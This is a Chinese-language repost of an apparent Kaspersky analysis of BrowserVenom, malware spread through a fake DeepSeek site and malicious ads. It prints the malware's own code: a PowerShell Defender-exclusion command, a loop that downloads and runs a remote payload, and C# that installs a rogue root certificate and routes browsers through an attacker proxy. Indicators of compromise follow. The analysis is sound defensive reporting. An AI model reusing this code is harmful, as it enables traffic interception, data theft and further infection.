新型BrowserVenom恶意软件通过伪造DeepSeek钓鱼网站分发

卡巴斯基发现新型恶意软件BrowserVenom通过伪造DeepSeek AI平台的钓鱼网站传播,利用恶意广告诱导用户下载,该恶意软件会劫持浏览器流量通过攻击者控制的代理服务器,窃取敏感数据。

新型BrowserVenom恶意软件通过伪造DeepSeek钓鱼网站分发

引言

DeepSeek-R1是当前最受欢迎的LLM之一。各种经验水平的用户都会在搜索引擎上寻找聊天机器人网站,威胁行为者开始滥用LLM的流行度。我们之前曾报道过以DeepSeek为幌子传播恶意软件的攻击。恶意域名通过X帖子和常规浏览传播。

但最近,威胁行为者开始使用恶意广告来利用对聊天机器人的需求。例如,我们最近发现了一个新的恶意活动,通过伪造的DeepSeek-R1 LLM环境安装程序分发先前未知的恶意软件。恶意软件通过伪装成官方DeepSeek主页的钓鱼网站传递。该网站在搜索结果中通过Google广告推广。攻击最终旨在安装BrowserVenom,这是一种植入程序,重新配置所有浏览实例以强制流量通过威胁行为者控制的代理。这使他们能够操纵受害者的网络流量并收集数据。

钓鱼诱饵

感染从一个钓鱼网站启动,位于https[:]//deepseek-platform[.]com。它通过恶意广告传播,当用户搜索“deepseek r1”时故意放置在顶部结果,从而利用模型的流行度。一旦用户访问该网站,就会执行检查以识别受害者的操作系统。如果用户运行Windows,他们将只看到一个活动按钮“立即尝试”。我们还看到了其他操作系统的布局,措辞略有变化,但都误导用户点击按钮。

模仿DeepSeek的恶意网站 点击此按钮将带用户到CAPTCHA反机器人屏幕。此屏幕的代码是混淆的JavaScript,执行一系列检查以确保用户不是机器人。我们在同一恶意域上发现了其他脚本,表明这不是此类活动的第一次迭代。成功解决CAPTCHA后,用户被重定向到proxy1.php URL路径,带有“立即下载”按钮。点击该按钮会从以下URL下载名为AI_Launcher_1.21.exe的恶意安装程序:https://r1deepseek-ai[.]com/gg/cc/AI_Launcher_1.21.exe。

我们检查了钓鱼和分发网站的源代码,发现了与网站功能相关的俄语注释,这表明它们是由俄语威胁行为者开发的。

恶意安装程序

恶意安装程序AI_Launcher_1.21.exe是下一阶段恶意软件的启动器。一旦此二进制文件执行,它会打开一个模仿Cloudflare CAPTCHA的窗口。

第二个伪造的CAPTCHA 这是另一个伪造的CAPTCHA,从https[:]//casoredkff[.]pro/captcha加载。勾选复选框后,URL附加了/success,用户看到以下屏幕,提供下载和安装Ollama和LM Studio的选项。

两个安装被滥用的LLM框架的选项 点击任一“安装”按钮实际上会下载并执行相应的安装程序,但有一个注意事项:另一个函数同时运行:MLInstaller.Runner.Run()。此函数触发植入程序的感染部分。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

private async void lmBtn_Click(object sender, EventArgs e)
{
    try
    {
        MainFrm.<>c__DisplayClass5_0 CS$<>8__locals1 = new MainFrm.<>c__DisplayClass5_0();
        this.lmBtn.Text = "下载中..";
        this.lmBtn.Enabled = false;
        Action action;
        if ((action = MainFrm.<>O.<0>__Run) == null)
        {
            action = (MainFrm.<>O.<0>__Run = new Action(Runner.Run));  # <--- 恶意软件初始化
        }
        Task.Run(action);
        CS$<>8__locals1.ollamaPath = Path.Combine(Path.GetTempPath(), "LM-Studio-0.3.9-6-x64.exe");
[...]

当MLInstaller.Runner.Run()函数在机器上的单独线程中执行时,感染按以下三个步骤发展:

首先,恶意函数尝试通过使用AES加密算法解密缓冲区来将用户文件夹从Windows Defender的保护中排除。 AES加密信息硬编码在植入程序中:

类型 AES-256-CBC
密钥 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20
IV 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10

解密的缓冲区包含一个PowerShell命令,一旦由恶意函数执行,就会执行排除。

1

powershell.exe -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $USERPROFILE

需要注意的是,此命令需要管理员权限,如果用户缺乏权限,将会失败。

之后,运行另一个PowerShell命令,从恶意域名下载可执行文件,其名称通过简单的域名生成算法(DGA)派生。下载的可执行文件保存为用户配置文件下的%USERPROFILE%\Music\1.exe,然后执行。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21

$ap = "/api/getFile?fn=lai.exe";
$b = $null;
foreach($i in 0..1000000) {
    $s = if ($i - gt 0)  {
        $i
    } else {
        ""
    };
    $d = "https://app-updater$s.app$ap";
    $b = (New - Object Net.WebClient).DownloadData($d);
    if ($b)  {
        break
    }

};
if ([Runtime.InteropServices.RuntimeEnvironment]::GetSystemVersion()  - match"^v2")  {
    [IO.File]::WriteAllBytes("$env:USERPROFILE\Music\1.exe", $b);
    Start - Process "$env:USERPROFILE\Music\1.exe"  - NoNewWindow
} else {
    ([Reflection.Assembly]::Load($b)).EntryPoint.Invoke($null, $null)
}

在我们研究时,只有一个域存在:app-updater1[.]app。目前无法从此域下载任何二进制文件,但我们怀疑这可能是另一个恶意植入程序,例如用于进一步访问的后门。到目前为止,我们已经获得了与此威胁相关的几个恶意域名;它们在IoCs部分突出显示。

然后,MLInstaller.Runner.Run()函数在恶意安装程序的缓冲区的类和变量ConfigFiles.load中定位硬编码的第二阶段有效负载。此可执行文件使用与之前相同的AES算法解密,以便加载到内存中并运行。

加载的植入程序:BrowserVenom

我们将下一阶段植入程序称为BrowserVenom,因为它重新配置所有浏览实例以强制流量通过威胁行为者控制的代理。这使他们能够嗅探敏感数据并监视受害者的浏览活动,同时解密其流量。

首先,BrowserVenom检查当前用户是否具有管理员权限 - 如果没有则退出 - 并安装威胁行为者创建的硬编码证书:

1
2
3
4
5
6
7
8
9

[...]
X509Certificate2 x509Certificate = new X509Certificate2(Resources.cert);
if (RightsChecker.IsProcessRunningAsAdministrator())
{
    StoreLocation storeLocation = StoreLocation.LocalMachine;
    X509Store x509Store = new X509Store(StoreName.Root, storeLocation);
    x509Store.Open(OpenFlags.ReadWrite);
    x509Store.Add(x509Certificate);
[...]

然后,恶意软件将硬编码的代理服务器地址添加到所有当前安装和运行的浏览器。对于基于Chromium的实例(即Chrome或Microsoft Edge),它添加代理服务器参数并修改所有存在的LNK文件,而对于基于Gecko的浏览器,如Mozilla或Tor Browser,植入程序修改当前用户的配置文件首选项:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

[...]
new ChromeModifier(new string[]
{
    "chrome.exe", "msedge.exe", "opera.exe", "brave.exe", "vivaldi.exe", "browser.exe", "torch.exe", "dragon.exe", "iron.exe", "epic.exe",
    "blisk.exe", "colibri.exe", "centbrowser.exe", "maxthon.exe", "coccoc.exe", "slimjet.exe", "urbrowser.exe", "kiwi.exe"
}, string.Concat(new string[]
{
    "--proxy-server=\"",
    ProfileSettings.Host,
    ":",
    ProfileSettings.Port,
    "\""
})).ProcessShortcuts();
GeckoModifier.Modify();
[...]

恶意软件当前使用的设置如下:

1
2
3
4

public static readonly string Host = "141.105.130[.]106";
public static readonly string Port = "37121";
public static readonly string ID = "LauncherLM";
public static string HWID = ChromeModifier.RandomString(5);

变量Host和Port用作代理设置,ID和HWID附加到浏览器的User-Agent,可能作为跟踪受害者网络流量的一种方式。

结论

正如我们一直报道的,DeepSeek一直是攻击者吸引新受害者的完美诱饵。威胁行为者使用新的恶意工具,如BrowserVenom,使检测他们的活动变得复杂。这与使用Google广告接触更多受害者和看起来更可信相结合,使此类活动更加有效。

在我们研究时,我们检测到巴西、古巴、墨西哥、印度、尼泊尔、南非和埃及的多次感染。诱饵的性质和攻击的地理分布表明,像这样的活动继续对不知情的用户构成全球威胁。

为了保护免受这些攻击,建议用户确认他们的搜索结果是否是官方网站,以及它们的URL和证书,以确保该网站是下载合法软件的正确位置。采取这些预防措施可以帮助避免此类感染。

卡巴斯基产品将此威胁检测为HEUR:Trojan.Win32.Generic和Trojan.Win32.SelfDel.iwcv。

危害指标(IoC)

哈希值

d435a9a303a27c98d4e7afa157ab47de AI_Launcher_1.21.exe dc08e0a005d64cc9e5b2fdd201f97fd6

域名和IP

  • deepseek-platform[.]com - 主要钓鱼网站
  • r1deepseek-ai[.]com - 分发服务器
  • app-updater1[.]app - 阶段#2服务器
  • app-updater2[.]app
  • app-updater[.]app
  • 141.105.130[.]106 - 恶意代理
comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次